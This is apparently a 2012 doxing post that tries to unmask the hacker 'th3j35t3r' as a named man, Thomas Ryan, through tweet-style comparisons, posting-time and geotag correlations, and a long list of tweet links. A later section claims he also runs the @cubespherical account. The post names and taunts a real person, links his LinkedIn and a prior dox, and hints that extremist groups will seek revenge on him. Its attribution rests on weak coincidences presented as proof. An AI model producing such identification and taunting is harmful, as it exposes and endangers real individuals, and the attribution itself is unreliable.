“www.ic3 .gov – TANGO DOWN. Temporarily. For not doing your job, & not arresting #Anonymous”

And: “www.fbi .gov – TANGO DOWN. Temporarily. For enabling recruitment, & co-ordination of#Anonymous via web.”

At this point, obvious troll is obvious – within days of LulzKitten’s tweet linking Tom Ryan and Jester, TR goes out of his way to tweet ‘Stay Frostys’, Jester winks and ‘TANGO DOWN’s. To give him credit, it’s a pretty smart way to make people think you’re nothing more than a Jester fanboy. Sadly for Thomas, it’s too late; the evidence linking Tom Ryan to Jester began from the moment TR began tweeting in January 2012. Prior to AntiSec dropping Jester’s dox on 11th March, Tom Ryan had only tweeted ‘Stay Frosty’ twice in three months. Immediately afterward, he tweets it five times in four days – complete with the Jester’s trademark wink.

So does that mean that all of the foregoing information is is part of an elaborate ploy, cooked up by Tom Ryan and Jester, to obfuscate the identity of the real Jester? In the case of the ‘Stay Frostys’ and the ‘TANGO DOWN’s, yes, it probably is. Thankfully, there are dozens of other textual similarities between the pair – similarities that are too subtle to be part of a pre-planned disinformation campaign.

Which leads nicely on to point #8: ‘Much’. Note the phrase that appears in the following tweets from Jester:

18th June: “http://www.techhomethebacon.com/news/hacking-infosec/th3j35t3r-links-nakomis-to-lulzsec-group-cover-up-ensues.html – backpeddaling much? Hacked? lol. -”

18th June: “Back-pedalling much?https://twitter.com/#!/Anonakomis/status/81862870664609792 #js”

August 21st WordPress blog entitled If ya can’t beat em, make some shit up??? LMAO!: “coincidence much?” “projection much??”

I wonder if TR ever lets slip a similar phrase? Oh, what’s this?:
14th March: “@kaepora Nadim, delete much? You’re in the snitch crew ?https://twitter.com/#!/realytcracker/status/143411708369715201 of @Anonymousabu & @ioerror”

Coincidence much?

#9: Jester loves to leave trailing dots in his tweets:

9th April: “<<< drums fingers on desk….”

3rd April: “Now…… imagine…… how many of those listed in my last, were ummmmmm – on the ‘shit list’ – just a thought??? #anonymous”

22nd November: “AFK…….”

He also uses trailing dots when he’s typing live into Notepad in this YouTube video: http://www.youtube.com/watch?v=WeO44IWlkfU

More of Jester’s ‘trailing dots’ tweets are cited at the end of this dox. Now it’s TR’s turn to deploy this tactic:

6th April: “@kennethlipp that’s how it went down with Barrett Brown too. Remember they ended up going to every address for him….according to him”

5th April: “@Bitchiest @KalyptoNet @TomRyanBlog The Secretary disavows this tweet and everybody in it…”

4th April: “#Anonymous ever wonder why certain high ups in your collective are never V& …. Look at cases that never went to court & who has relocated”

Again, more examples of this idiosyncrasy can be found cited at the end of this dox, as well as liberally scattered throughout Tom Ryan’s Twitter feed.

#10: Arrows. Jester loves to use arrows to break up words in his tweets, <<just like this>>:

9th April: “”@VizFoSho: @th3j35t3r dun goofedhttp://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG@RepDan_Gordon” <<< Shit ya got me! What am I to do? Btw now I am near north pole.”

28th March: “@wwpinc – just in case you were not aware: >>>https://th3j35t3r.wordpress.com/support/ <<< – keep up the great work ;-) Peace. #pgr #wwp#woundedwarrior”

Now TR:

6th April: “Hmmm So @AnonW0rmer is arrested at 10:30http://j.mp/HiAASP tweets till 3:32, @ItsKahunadisappears @AnonymousIRC disappears for 4 Day >>>”

13th March: “Don’t know whether to laugh or feel bad but come on: (compatible;+MSIE+6.0;+Windows+98;+Win+9×4.90) << In This Day An Age??”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Glance through their tweets and you’ll see that J and TR use <<arrows>> all the time.

#10: UPPER CASE. Compare the tweets of J and TR and you’ll notice that they both love to highlight single words in capitals. Jester first:

9th April: “WARNING: Tweeps in mirror are closer than they appear.”

18th March: “I’m still asked WHY I hit #wikileaks, skip to 28mins 12secs & Major TJ O’Connor abt sums it uphttp://www.youtube.com/watch?v=buY3I4PkK98<<worth watching it all.”

11th March: “@repdangordon be advised, when u file ur complaint to feds, they ARE going need ur cell for forensics to determine IF I hacked u at all ;-( ”

Tom Ryan’s turn:

5th April: “INTERESTING: What is this ugly brown stain on a Key Member of Anonymous’ back? I need to do my cropping for the new site launch. Peace!”

5th April: “#Anonymous why so many military and sovereign citizen connections? GOD I aam glad I took 2 weeks to lay low.”

4th April: “@MaxVenator Too cold and windy for the Hamptons BUT you gave me a good idea. Maybe we can turn Plum Island into a resort for#Anonymous”

Jester and Tom Ryan both use this technique DOZENS of times in their tweets.

#11 features a more subtle similarity between our Jester and our Clown:

Jester, 21st August: “If ya can’t beat em, make some shit up??? LMAO! -”

TR, 16th March: “@exiledsurfer ROFLMAO! Reminds me of being in Bahrain & Abu Dhabi hearing Garth Brooks “Friends in Low Places””

Jester and Thomas don’t always laugh their asses off, but when they do, you can bet it’s in upper case with an exclamation mark at the end. (More examples, as always, are cited in the conclusion of this dox.)

#12: J and TR aren’t very good at spelling. They struggle especially with words such as ‘its’ and ‘it’s’. Jester’s tweets aren’t usually too bad for typos, as he doesn’t rush them (because he knows they will be analyzed by a wide range of foes who might otherwise have cause to mock him for his poor grammar). He also has the autocorrect on his Android phone to help him. He still struggles with those pesky apostrophes that autocorrect can’t pick up however, especially when he tweets from his desktop:

6th March: “WTF is Wikileaks gonna do now it’s source of illegally obtained private info (anon/lulz) has had it’s head & skillset removed? #2birds1Stone”

21st June: “Seems almost as if ‘somebody’ doesn’t want you to see my last link – here’s a pastebin of it’s content.”

In his WordPress blog however, Jester often mixes up his apostrophes, especially in words such as ‘its’:

“With Netcat listening at the other end for incoming connections, you can configure it to execute it’s own script when it receives a connection for example to send a Message of the Day to the connecting device, you would run netcat like this on your server”

Watch his two YouTube videos (links cited at the end) in which he types directly into Notepad and you’ll see he also fails to put apostrophes into words such as ‘lets’, ‘its’ and ‘Thats’. 2:20 into his XerXes DoS Attack video and you’ll see that the text displayed on Jester’s self-designed software also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle, while at 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also makes the same error when typing into Notepad.

Does Tom Ryan fare any better in the spelling stakes? No. In fact he’s even worse when it comes to tweeting typos. That’s because Thomas tweets ten times as frequently as Jester, tweets more hastily (lots of rushed replies to his Twitter buddies) and because he writes the tweets on his Mac, which doesn’t autocorrect his mistakes. Look:

4th April: “@AdrianChen surprised your not all over the@Anonw0rmer arrest and shortly after the disappearance of @itskahuna”

5th April: “To those I owe something too, It’s on it’s way!”

30th March: “RED ALERT: tomorrow is #NoClick31 just as a precaution. Rumor has it #Anonymous is using it’s Porn Bots for #opBlackout click to DDOS attack”

Wanna see more? Just read his tweets.

OK, we’ve almost reached the really juicy stuff linking Jester and Thomas, but first there are a couple more writing similarities to rattle through:

#13: J and TR write numbers numerically rather than alphabetically – even when composing short tweets.

Jester, 28th Feb: “4 more Anons V&’ed http://tinyurl.com/8a2g5k5#anonymous”

10th Nov: “#stayfrosty -Word of advice 2 @barrettbrownlol: Just because you’re paranoid doesn’t mean they aren’t out to get you. >”

27th November: “#saladin (XerXes bro)- ‘the best weapon is the one u never have 2 fire…I prefer the weapon u only need 2 fire once.’”

20th July: “Never saw a wild thing sorry 4 itself. Small bird drop frozen dead from bough without ever having felt sorry 4 itself.”

TR – yep, you’ve guessed it – does exactly the same:

5th April: “@ohmylulz will with 2 False Positives.@missarahnicole @AsherahResearch”

4th April: “Ruh roh! A certain key #Anonymous member disappears for 4 days then reappears. We know what that means.”

3rd April: “@Ihazcandy I should start digging into them. Since I have 2 weeks of downtime.”

OK, moving on (we’re nearly done, I promise) to #14: Hashtags. If you go to tweetstats.com and enter TR and J’s twitter names into separate windows, a series of pretty graphs will be generated that will allow you to compare their tweeting patterns. You’ll notice that they tweet from separate devices, to eliminate the possibility of accidentally tweeting to the wrong account – Tom Ryan likes to keep his iPhone in one pocket and his Android in the other for when he’s playing Jester. Click on the Tweet Cloud tab at the top of the page and you’ll be able to view the most frequent hashtags used by both parties. Not too surprisingly, given their obsession with all things masked, it’s #anonymous. There are also three other hashtags that the pair use prominently however – #fail, #justsayin and #infosec. The latter one is understandable, but the other two? Interesting. Let’s see some #fail and #justsayin in action, starting with Jester:

3rd November: “#opcartel #anonymous You should really listen to what this man has to say. Remember your track record is full of #fail”

15th August: “@anonymousabu U R #fail. U hurt who u claim to fight for (lol), u have agenda < http://reg.cx/1Qps& the agenda is >”

14th August: “So @landrytom u finally got ur mention. Damn u zeroed my ‘xchat’? Please all check out his timeline. Then ask him where is the pwnage? #fail”

29th July: “1st up: My doxing. That’s a #fail. (again) I have never been Ryan Berg, John Willander, Robin Jackson, Anthony Freed, Beau Colvin. #opFrosty”

2nd June: “http://www.foxnews.com/scitech/2011/06/02/pentagon-has-secret-list-cyber-weapons/ – #justsayin;-) #oorah”

Now it’s Tom Ryan’s turn to #Fail (#Justsayin):

5th April: “@agentdarkapple @AsherahResearch she’s definitely is no @elizadushku , Mila Kunis or Megan Ackerman. So she’s a #Fail”

2nd April: “@subverzo TY for verifying 2 alternate personas yours & @CrappyTires . FYI, Everyone in the CT world knows Shumukh al-Islam Forum. #FAIL”

9th March: “@AnonymousIRC you do know they rig cases to#FAIL inorder to capture bigger FISH ….. Right?@atopiary @lolspoon @AnonymouSabu”

9th Feb: “Dangerous Tweets: Arrested, fined in 140 characters or less http://j.mp/yWAV4G << What ever happened to contextual analysis? another#Fail” (Note the classic Jester-style arrows used in this tweet as well.)”

10th March: “#anonymous remember threatening people or family members can lead to several crimes. If they are harmed it becomes much worse. #justsayin”

9th March: “conspiracy 1. a plan or agreement to carry out an illegal or harmful act 2. the act of making such plans >> aka #Anonymous Ops #justsayin<<”

Plenty more examples, as always, can be found cited in the footnotes at the end of this dox.

OK, here endeth the writing analysis lesson. Thank you for your patience :) It would be fair to say we’ve established that Jester and Tom Ryan tweet in an uncannily similar manner, but that’s not all. Now we get on to the really good shit…

#15: Tweet times. Using tweetstats.com, it’s possible to compare the times at which J and TR tweet. A quick glance at their respective Tweet Density graphs reveals a similar pattern: neither of them tweets between 3am and 7am EST: they’re both East coast bitches. Interesting.

#16: A few days ago, @VizFoSho tweeted the following image:

http://www.picvalley.net/u/1980/407013641289457528133400533586itAR4VE93lm7DAkGd2.PNG

It depicts two Jester tweets from 7th April, both geo-stamped with Atlantic City, NJ on them. Atlantic city is within 150 miles of NY, where Tom Ryan lives. On 26th March, Jester also posted a single tweet from New York: https://twitter.com/#!/th3j35t3r/status/184333789697282048

Normally, Jester’s tweets don’t reveal his location. Up until April 2012, there had only been four instances in which Jester’s tweets revealed his location – and two of those occurred when he was at DEFCON Nevada and Hacker Halted in Miami, occasions when he was undoubtedly eager to reveal his location in order to prove he was in attendance. Were the New York and Atlantic City revelations accidental (Tor for Android not working properly perhaps?) or was Jester trying to provide more misinformation?

After @VizFoSho pointed out the NJ link (the NY slip-up had gone unnoticed), Jester went out of his way to post two tweets from ridiculously exotic locations – Cape Town on 9th April and then Hawaii on 10th April:

https://twitter.com/#!/th3j35t3r/status/189464600318722049
https://twitter.com/#!/th3j35t3r/status/189464600318722049 “The octopus here is amazing. Dontcha think :-)”

Jester has never previously switched his location to a far-flung location purely for the lulz. Why should he suddenly be trying so hard now that he’s been identified as an East coast slacker? If he’s not Tom Ryan, why should be bothered if people think he’s from NJ or NY?

On 4th April, Jester made the second of his two Atlantic City tweets at 4:03pm. 11 minutes earlier, Tom Ryan had also posted a tweet. For the next 48 hours, neither account tweeted – a rare occurrence, especially for TR who averages over 30 tweets a day. Enjoying a couple of days in Atlantic City playing the slots, perhaps?

Here are the 4th April tweets from both parties:

https://twitter.com/#!/th3j35t3r/status/187610604314431488

https://twitter.com/#!/th3j35t3r/status/187616455762784257

https://twitter.com/#!/TomRyanBlog/status/187612824187584512

Curiouser and curiouser. But that’s not all. On 23rd March, TR tweets:

“Headed to South Beach to enjoy this great weather! Later Tweeps!”

https://twitter.com/#!/TomRyanBlog/status/183199880922148864

For the next 48 hours, Jester and Tom Ryan are both absent from Twitter.

A month earlier, on 17th February, the same thing happens after TR tweets:

“Off the Grid for a few days ! Have a great 3 day weekend!”

https://twitter.com/#%21/TomRyanBlog/status/170321854723129344

For the next four days, neither party tweets. The first person to break the Twitter silence is Jester, and it’s another rare instance of him revealing his location – Arlington VA.
https://twitter.com/#!/th3j35t3r/status/172077181051219968
Enjoy your three-day weekend, Thomas?

I stated earlier that until April Jester had never previously switched his location to a far-flung country, but I lied – there IS actually one occasion when Jester appeared to be out of the country. On 25th January, he posted the following tweet:

“To all who have DM’ed asking after my whereabouts & welfare…am safe & limbering up. It’s a brave new year. TY 4 support. Stay Frosty.”
https://twitter.com/#!/th3j35t3r/status/162261098035298304

His alleged location? Brescia, Italy. What about Thomas Ryan – what was he up to around this time? Well here’s the thing: between 23rd and 26th January, TR (a man who likes to tweet all day, erryday) doesn’t post a single tweet. Too busy enjoying the bruschetta, washed down with a bottle of Barolo perhaps?

A final word on correlating Twitter times before we move onto our final two points: take a look at the timeline for Jester and Tom Ryan’s tweets. Notice how they often tweet at almost exactly the same time as one another? For example, take Tuesday 10th April. After two hours without activity from either account, Thomas posts the following at 15:30pm:
“Now I feel really special. Someone created a hidden stream about me and monitors it.”
One minute later, at 15:31, Jester tweets “@alemarahweb‏ – ‎http://www.alemara1.com‏ – TANGO DOWN – أنا كنت”
Observe any two Twitter accounts for long enough and you’ll find timing coincidences of course. However, compare Jester and Tom Ryan’s accounts on any given day and you’ll spot a predictable pattern: they always broadly correlate i.e. there is a short burst of tweets, followed by a 45 minute break while Jester/Ryan goes for a wank or to chow down some beef jerky.

Right, two more points to raise and then I’ll leave you in peace:

#17: When LulzKitten tweeted Jester’s dox on 29th March, how did Tom Ryan – the man with the military wallpaper on his Twitter page – respond? “@J_P_Holloway @lulzkitten @YourAnonNewsyou guys really suck at DOXing thinking I am@th3j35t3r everyone knows I was never in the Army #fail”
https://twitter.com/#!/TomRyanBlog/status/185189598677319680

Two things stand out here: firstly, we have no way of knowing that Jester was in the army. Yes, he has an interest in all things military, but the rumor that he actively served in the army is widely believed to be false.

On 13th March however, TR tweeted the following: “When I was in the military, Greenpeace would try to board Aircraft Carriers. Some things aren’t smart & never thought of till it’s too late.”
https://twitter.com/#!/TomRyanBlog/status/179637065154170880

Military, shmilitary; does anyone see a connection here? Thought so. Without further ado, let’s proceed to our final, fateful tweet of interest. On 10th February, Thomas Ryan tweeted the following:

“I wonder if operating Multiple Personas has ever given anyone Multiple Personality Disorder.”

I don’t know Jester, you tell me ;) Tick tock. No response? Oh well, Stay Frosty…

**********

POSTSCRIPT: Could it be that Tom Ryan is such an attention-whore that he’s trolling us all in the hope of being mistaken for the Jester? I guess it’s technically possible, but if so, it’s the most elaborate and painstaking trolling campaign ever conceived – and one that would have to involve the collusion of both parties. If, by some miracle, Thomas Ryan is not Jester, he knows exactly who Jester is – to the extent where he probably even vacations with him. When you review all the evidence however, there can only be one logical conclusion to draw: they are one and the same person.

On 13th March, Tom Ryan posted the following poignant message: “@ArtByAlida although Anonymous doesn’t like@th3j35t3r I do. It’s safer that certain people are never doxed.”
https://twitter.com/#!/TomRyanBlog/status/179636120710152192

You’re right Tom – it would be safer, but the truth always comes out in the wash, don’t you find? I hope you’ve got a few passports lying around, cos you’re gonna need them. Remember those Muslim extremists whose websites you downed and whose threats you retweeted? Oh, they mad. They real mad.

One last thought before I shovel the dirt over Jester’s shriveled corpse: I notice that your Twitter nick is Boondock Saint, in tribute to The Boondock Saints, a movie about two Irish vigilantes. Just out of interest, I wonder what The Internet Surname Database would make of Thomas Ryan’s moniker?

http://www.surnamedb.com/Surname/Ryan

Why, they appear to believe that Ryan is an Irish surname. To quote from my favorite hacktivist for good, ‘Coincidence much?’

Congratulations Thomas; you just got pwned by an amateur who doesn’t even have the skills to label himself a skid, never mind a hacker. Butthurt much?

In the words of your nemesis, @anonymouSabu, “Nigga, troll harder.”

pwned by @spoolfiend

**********

Citations:

LulzKitten tweet linking TR and J: https://twitter.com/?utm_medium=twitter&utm_source=twitterfeed#!/YourAnonNews/statuses/185150794079809536

Check when th3j35t3r and RobinSage joined Twitter: http://www.whendidyoujointwitter.com/

TR’s LinkedIn (where you’ll see proof that he attended Hacker Halted and DEFCON last year): http://www.linkedin.com/in/tommyryan

TR and J professing their love of sushi:
https://twitter.com/#!/TomRyanBlog/status/178202424056610817
https://twitter.com/#!/th3j35t3r/status/128849629939892224

Tom Ryan dox by AntiSec: http://pastebin.com/ZAxBWKi8

J likes to say ‘Hmmm’ a lot:

https://twitter.com/#!/th3j35t3r/status/187996120180457472

Occupy Wall Street?? 99%?? Ummm.

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/174163673940631552

https://twitter.com/#!/th3j35t3r/status/182268058168082432

https://twitter.com/#!/th3j35t3r/status/187535767843778560

TR also likes to say ‘Hmmm’:

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/180117386291195906

https://twitter.com/#!/TomRyanBlog/status/178896960546287617

https://twitter.com/#!/TomRyanBlog/status/177482894443417600

https://twitter.com/#!/TomRyanBlog/status/170195932388925441

https://twitter.com/#!/TomRyanBlog/status/189680060863754241

J goes ‘Tick tock’:

https://twitter.com/#!/th3j35t3r/status/96268183723450369

https://twitter.com/#!/th3j35t3r/status/177033974324002816

https://twitter.com/#!/th3j35t3r/status/83145887307677696

https://twitter.com/#!/th3j35t3r/status/95195869921554433

https://twitter.com/#!/th3j35t3r/status/98828156663889920

Lulzsec’s CloudFlare Configuration

TR goes ‘Tick tock’:

https://twitter.com/#!/TomRyanBlog/status/174132025215811585

J ‘Stay frosty’:

https://twitter.com/#!/th3j35t3r/status/186923663734489088

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/129246959021203456

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/81862725638160385

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TR ‘Stay frosty’:

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179298552680415232

https://twitter.com/#!/TomRyanBlog/status/178571536691765249

https://twitter.com/#!/TomRyanBlog/status/178529239052730368

https://twitter.com/#!/TomRyanBlog/status/178336251240382464

https://twitter.com/#!/TomRyanBlog/status/179622057305317376

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

J likes to wink:

https://twitter.com/#!/th3j35t3r/status/184373769958211584

https://twitter.com/#!/th3j35t3r/status/120271829377097728

https://twitter.com/#!/th3j35t3r/status/76373640832225282

https://twitter.com/#!/th3j35t3r/status/185019516793786370

https://twitter.com/#!/th3j35t3r/status/81477469135319040

https://twitter.com/#!/th3j35t3r/status/178878010961833986

TR likes to wink:

https://twitter.com/#!/TomRyanBlog/status/187885131976024064

https://twitter.com/#!/TomRyanBlog/status/187372927946211328

https://twitter.com/#!/TomRyanBlog/status/179932280809197568

https://twitter.com/#!/TomRyanBlog/status/180689040385900544

https://twitter.com/#!/TomRyanBlog/status/189679107347460097

https://twitter.com/#!/TomRyanBlog/status/169492746871119873

https://twitter.com/#!/TomRyanBlog/status/179655809280655361

https://twitter.com/#!/TomRyanBlog/status/179802508372344832

https://twitter.com/#!/TomRyanBlog/status/179669923163938816

https://twitter.com/#!/TomRyanBlog/status/187914228810784769

J ‘much?’:

https://twitter.com/#!/th3j35t3r/status/82200919365787648

https://twitter.com/#!/th3j35t3r/status/81871769832665088

If ya can’t beat em, make some shit up??? LMAO!

TR ‘much?’:

https://twitter.com/#!/TomRyanBlog/status/179927195022659584

J ‘…’:

https://twitter.com/#!/th3j35t3r/status/189139338796351492

https://twitter.com/#!/th3j35t3r/status/186958030791905282

https://twitter.com/#!/th3j35t3r/status/186749312166932483

https://twitter.com/#!/th3j35t3r/status/128849629939892224

https://twitter.com/#!/th3j35t3r/status/138951576789331968

https://twitter.com/#!/th3j35t3r/status/168769540598145025

https://twitter.com/#!/th3j35t3r/status/179233292682407937

https://twitter.com/#!/th3j35t3r/status/184321677092597760

TR ‘…’:

https://twitter.com/#!/TomRyanBlog/status/188088227704487936

https://twitter.com/#!/TomRyanBlog/status/187342615648272384

https://twitter.com/#!/TomRyanBlog/status/188829946439929856

https://twitter.com/#!/TomRyanBlog/status/189449964219400194

https://twitter.com/#!/providesecurity/status/187253830315016192

https://twitter.com/#!/TomRyanBlog/status/189757038778269696

https://twitter.com/#!/Render64/status/187912159655772161

J ‘<<arrows>>’:

https://twitter.com/#!/th3j35t3r/status/189463655811780609

https://twitter.com/#!/th3j35t3r/status/185019516793786370

TR ‘<<arrows>>’:

https://twitter.com/#!/TomRyanBlog/status/179683104972210176

https://twitter.com/#!/TomRyanBlog/status/188096685250068480

https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/178555495806803968

https://twitter.com/#!/TomRyanBlog/status/179321093897723904

J using UPPER case:

https://twitter.com/#!/th3j35t3r/status/189165520556277761

https://twitter.com/#!/th3j35t3r/status/178895612723478531

https://twitter.com/#!/th3j35t3r/status/181438361511280640

https://twitter.com/#!/th3j35t3r/status/82538803188862976

https://twitter.com/#!/th3j35t3r/status/98386681836736512

https://twitter.com/#!/th3j35t3r/status/177544329458491392

https://twitter.com/#!/th3j35t3r/status/135438221483048960

https://twitter.com/#!/th3j35t3r/status/177568887334903808

https://twitter.com/#!/th3j35t3r/status/110676313366462464

https://twitter.com/#!/th3j35t3r/status/127396730621788160

https://twitter.com/#!/th3j35t3r/status/100282273072549890

https://twitter.com/#!/th3j35t3r/status/178566407909412866

https://twitter.com/#!/th3j35t3r/status/132173511874711552

https://twitter.com/#!/th3j35t3r/status/94485325744848896

https://twitter.com/#!/th3j35t3r/status/97333572955947008

https://twitter.com/#!/th3j35t3r/status/91970882095943680

https://twitter.com/#!/th3j35t3r/status/141002481260961792

TR using UPPER case:

https://twitter.com/#!/TomRyanBlog/status/187908914417893379

https://twitter.com/#!/TomRyanBlog/status/188461215348031489

https://twitter.com/#!/TomRyanBlog/status/187018163567853568

https://twitter.com/#!/TomRyanBlog/status/185423913197637633

https://twitter.com/#!/TomRyanBlog/status/187240901574266881

https://twitter.com/#!/TomRyanBlog/status/180380942614016001

https://twitter.com/#!/TomRyanBlog/status/187903623693467648

https://twitter.com/#!/TomRyanBlog/status/187361681452699649

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187322975383588864

https://twitter.com/#!/TomRyanBlog/status/187309018623127552

https://twitter.com/#!/TomRyanBlog/status/187558445036216320

https://twitter.com/#!/TomRyanBlog/status/187541167972417536

https://twitter.com/#!/TomRyanBlog/status/187656738818899968

https://twitter.com/#!/TomRyanBlog/status/187261297669308416

https://twitter.com/#!/TomRyanBlog/status/187530160134828032

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

Jester ‘LMAO!’:

https://twitter.com/#!/th3j35t3r/status/105305979733815296

TR ‘ROFLMAO!’:

https://twitter.com/#!/TomRyanBlog/status/180709354624925696

https://twitter.com/#!/TomRyanBlog/status/179773457943371776

https://twitter.com/#!/TomRyanBlog/status/187709243087003650

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

https://twitter.com/#!/TomRyanBlog/status/187272732147322880

https://twitter.com/#!/TomRyanBlog/status/187583747154132992

J struggles with apostrophes:

https://twitter.com/#!/th3j35t3r/status/83239272504770560

https://twitter.com/#!/th3j35t3r/status/177080046597578752

https://twitter.com/#!/th3j35t3r/status/186749312166932483

(See his blog for heaps more examples.)

http://www.youtube.com/watch?v=WeO44IWlkfU (Skip to 5:07); ‘lets’, ‘its’ and ‘Thats’ should all have apostrophes.

http://www.youtube.com/watch?v=yJTvzErKHWE Look at the Notepad he’s typing into: ‘lets’ should have an apostrophe and ‘peak’ should have two ‘e’s in it. Skip to 2:20: the text on Jester’s self-designed Xerxes machine also contains typos: ‘SUCCESFULLY’ should have two ‘s’ in the middle. At 2:29, you’ll see that ‘Secured’ has also been spelt wrongly. At 6:52 he also types the same misspelt word into Notepad.

TR also struggles with apostrophes:

https://twitter.com/#!/TomRyanBlog/status/187920367845781504

https://twitter.com/#!/TomRyanBlog/status/187710784690855936

https://twitter.com/#!/TomRyanBlog/status/180432605680902144

https://twitter.com/#!/TomRyanBlog/status/187645320442822656

https://twitter.com/#!/TomRyanBlog/status/187531807598714880

https://twitter.com/#!/TomRyanBlog/status/187917710498336769

https://twitter.com/#!/TomRyanBlog/status/185737304290234368

https://twitter.com/#!/TomRyanBlog/status/178485680899502081

J tweets ‘TANGO DOWN’:

https://twitter.com/#!/th3j35t3r/status/175040242477318144

https://twitter.com/#!/th3j35t3r/status/175029005718794240

TR tweets ‘TANGO DOWN’:

https://twitter.com/#!/TomRyanBlog/status/186482996352778240

https://twitter.com/#!/TomRyanBlog/status/186482690797744128

J always writes numbers numerically:

https://twitter.com/#!/th3j35t3r/status/174540542724669441

https://twitter.com/#!/th3j35t3r/status/93771304607563776

https://twitter.com/#!/th3j35t3r/status/114830590452310016

https://twitter.com/#!/th3j35t3r/status/134434056925483008

https://twitter.com/#!/th3j35t3r/status/140925221090758656

https://twitter.com/#!/TomRyanBlog/status/185576329712910336

TRB always writes numbers numerically:

https://twitter.com/#!/TomRyanBlog/status/187211721365139456

https://twitter.com/#!/TomRyanBlog/status/187712594373648384

https://twitter.com/#!/TomRyanBlog/status/178965908696481793

https://twitter.com/#!/TomRyanBlog/status/187680293984022529

https://twitter.com/#!/TomRyanBlog/status/187539614876176384

Compare TR and J’s tweet patterns, in particular the time of day they tweet at and the hashtags they use: http://tweetstats.com (Open two separate windows and enter their Twitter names).

J using #Fail:

https://twitter.com/#!/th3j35t3r/status/132152349639720960

https://twitter.com/#!/th3j35t3r/status/103200916156588032

https://twitter.com/#!/th3j35t3r/status/102784136015646722

https://twitter.com/#!/th3j35t3r/status/97030633330716674

https://twitter.com/#!/th3j35t3r/status/178966110694150144

J using #Fail:

https://twitter.com/#!/TomRyanBlog/status/187708057344671744

https://twitter.com/#!/TomRyanBlog/status/167697098047889411

https://twitter.com/#!/TomRyanBlog/status/177978089203175424

https://twitter.com/#!/TomRyanBlog/status/178269119316107264

https://twitter.com/#!/TomRyanBlog/status/186927307544477697

https://twitter.com/#!/TomRyanBlog/status/178573080438898689

https://twitter.com/#!/TomRyanBlog/status/178982123959619585

https://twitter.com/#!/TomRyanBlog/status/185189598677319680

https://twitter.com/#!/TomRyanBlog/status/186930868273676288

https://twitter.com/#!/TomRyanBlog/status/186965988082843648

J using #Justsayin:

https://twitter.com/#!/th3j35t3r/status/76373640832225282

TRB using #Justsayin:
https://twitter.com/#!/TomRyanBlog/status/177907983227949056

https://twitter.com/#!/TomRyanBlog/status/179578215411630080

https://twitter.com/#!/TomRyanBlog/status/178518183525888000

https://twitter.com/#!/TomRyanBlog/status/184620737821286402

https://twitter.com/#!/TomRyanBlog/status/184270112361168898

_________________________________________________________________________

PIRAX DOXING CONTINUED… (The ‘smedley manning’ debacle)
You took this DOX’ing really well, to be honest. You shook it off as a mere fancification numerous times, and continued forward head-strong, apparently unmoved by those watching from the outside. But you knew deep-down that you had to eradicate this DOX from the minds of the enemies you have procured over the years. You know that a lot of people would like to see you gone. So, you came up with a plan.

The plan went something like this:
On May 10th, you registered the Twitter account @cubespherical and labeled it as “Smedley Manning”, as an obvious satirical homage to the now imprisoned Bradley Manning, a REAL soldier who fought for truth. You then exchanged a few messages with @th3j35t3r to make it look like a legitimate conversation, and began to “leak” information about yourself. We both know that this information is false, and was only created to distract others from the real DOX, located above. We know you are somewhat intelligent. However, there will always be those who will outsmart you. Consider yourself outsmarted.

Here is the analysis, broken down:
After you took down both your Twitter and WordPress blog, the mainstream blogosphere was certain you had finally been figured out. They assumed this was your acknowledgement of your own defeat and were positive you had been successfully DOX’d by @cubespherical. You were finally giving up. You knew they would react this way… It was all a part of your master plan. But, in reality, you ARE @cubespherical. Yes, @th3j35t3r and @cubespherical are the same person. Nicely done, Tom. You fooled almost everyone. But, like all good things (“good” meaning something along the lines of “idiotic” in this case), you must come to an end.

So how can we justify this claim? Where is our proof? Simple: You gave us everything.

Red-Flag #1: You have been a pretty regular user of Twitter until very recently, after the above DOX was published.

Red-Flag #2: An entirely new DOX is now being teased, even while the above DOX is as sure-fire as they come. Who would believe that a DOX coming from @cubespherical, an entirely new one at that, would be legitimate?

Red-Flag #3: You sat idle on Twitter while @cubespherical AKA Smedley Manning openly talked shit about you, only responding once things became heated on InfoSecIsland. This will take some psychological investigation, but it is damning nonetheless. Your article here is the most revealing bit of all:

http://www.infosecisland.com/blogview/21348-Not-Totally-Sure-What-Just-Happened.html

You started off with the following line, paraphrased: “I thought Smedley was my friend at first [you used the word ‘supporter’] hurr durr, but he then started threatening me hurr durr.” That doesn’t even sound realistic. But it *is* a subtle way to garner sympathy. I applaud you for you effort.

Red-Flag #4: Next up is your subtle jab at Anonymous. You changed @cubespherical’s avatar to a picture of a Guy Fawkes mask and deleted the Bitcoin address in exchange for the “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.” motto.

In your article, you say “Even if this was a common troll, he just demonstrated that any fool can speak for and ‘as’ Anonymous.”

It is clear that you did this for one reason: to throw spears at Anonymous while appearing to be a victim of cyber-bullying on a much grander scale.

Red-Flag #5: You are subconsciously promoting @cubespherical’s efforts for Bitcoin donations.
